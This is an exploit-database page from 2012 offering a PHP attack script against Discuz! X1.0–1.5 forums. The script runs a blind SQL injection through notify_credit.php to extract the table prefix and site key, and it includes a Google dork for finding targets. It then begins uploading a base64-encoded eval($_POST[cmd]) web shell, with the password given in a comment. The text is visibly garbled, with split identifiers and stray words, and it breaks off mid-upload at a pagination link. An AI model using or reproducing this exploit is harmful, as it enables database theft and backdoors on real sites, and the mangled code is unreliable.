discuz! X1. 0 – X1. 5 Blind SQL injection exploit & Get Shell-vulnerability warning-the black bar safety net

2012-04-08T00:00:00
ID MYHACK58:62201233600
Type myhack58
Reporter 佚名
Modified 2012-04-08T00:00:00

Description

Exploit Title: [discuz! X1. 0 - X1. 5 Blind SQL injection exploit &Get Shell]

Date: [06-04-2012]

Author: [Hacker-Fire]

Category:: [ webapps]

Google dork: [Powered by Discuz]

Tested on: [Windows 7 ]

[~] P0c [~] :

<? Php

print_r ('

+ ------------------------------------------------- -------------------------- +

Discuz! 1-1. 5 notify_credit.php Blind SQL injection exploit By Hacker-Fire

Description: follow-up getshell add the code down

+ ------------------------------------------------- -------------------------- +

');

if($ argc <2) {

print_r ('

+ ------------------------------------------------- -------------------------- +

Usage: php '$ argv [0].' Url [pre]

Example:

php '$ argv [0].'http://localhost/ in the

php '. $ argv [0].'http://localhost/ xss_

+ ------------------------------------------------- -------------------------- +

');

exit;

}

error_reporting(7);

the ini_set('set max_execution_time large', 0);

$ Url = $ argv [1];

$ Pre = $ argv [2]? $ Argv [2]: 'pre_';

$ Target = parse_url($ url);

extract ($ target);

$ Path1 = $ path. '/ Api / trade / notify_credit.php';

$ Hash = array();

$ Hash = the array_merge($ hash range (4 8, 5 7));

$ Hash = the array_merge($ hash range (9 7, 1 0 2));

$ Tmp_expstr = "'";

$ Res = send ();

if(strpos($ res, 'SQL syntax') == false) {var_dump ($ res); die('Oooops. I can NOT hack it.');}

preg_match ('/ FROM \ s ([a-zA-Z_] +) forum_order /', $ res, $ match);

if($ the match [1]) $ the pre = $ match [1];

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE" ='";

$ Res = send ();

if(strpos($ res, "does not exist") == false) {

echo"Table_pre is WRONG! \ nReady to Crack It. Please Waiting .. \ n";

for($ i = 1; $ i <2 0; $ i + +) {

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND LENGTH (REPLACE ( table_name, 'forum_post_tableid',")) = $ i AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

$ Pre =";

$ Hash2 = array();

$ Hash2 = array_merge($ hash2 range (4 8, 5 7));

$ Hash2 = array_merge($ hash2, range (9 7, 1 2 2));

$ Hash2 [] = 9 5;

for($ j = 1; $ j <= $ i; $ j++) {

for($ k = 0; $ k <= 2 5 5; $ k + +) {

if(in_array ($ k, $ hash2)) {

$ Char = dechex($ k);

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND MID (REPLACE ( table_name, 'forum_post_tableid',"), $ j, 1) = 0x {$ char} AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

echochr($ k);

$ The pre = chr($ k); the break;

}

}

}

}

if(strlen($ pre)) {echo"\ nCracked ... Table_Pre:". $ pre. "\ n"; break;} else{die('GET Table_pre Failed ..');};

}}};

echo"Please Waiting.... \ n";

$ Sitekey =";

for($ i = 1; $ i <= 3 2; $ i + +) {

for($ k = 0; $ k <= 2 5 5; $ k + +) {

if(in_array ($ k, $ hash)) {

$ Char = dechex($ k);

$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE skey = 0x6D795F736974656B6579 AND MID (svalue, {$ i}, 1) = 0x {$ char} AND" = '";

$ Res = send ();

if(strpos($ res, 'SQL syntax')! == false) {

echochr($ k);

$ Sitekey. = Chr($ k); break;

}}}}

/ *

By: alibaba

Modify andadd some code, andifsuccessful will be able to gain the shell

The word secret is: cmd

  • /

if(strlen($ sitekey)! = 3 2)

{

echo"\ nmy_sitekey not found. try blank my_sitekey \ n";

}

elseecho"\ nmy_sitekey: {$ sitekey} \ n";

echo"\ nUploading Shell ...";

$ Module = 'video';

$ Method = 'authauth';

$ Params = 'a: 3: {i: 0; i: 1; i: 1; s: 3 6: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7pz4 ="; i: 2; s: 3: "php";}';

[1] [2] next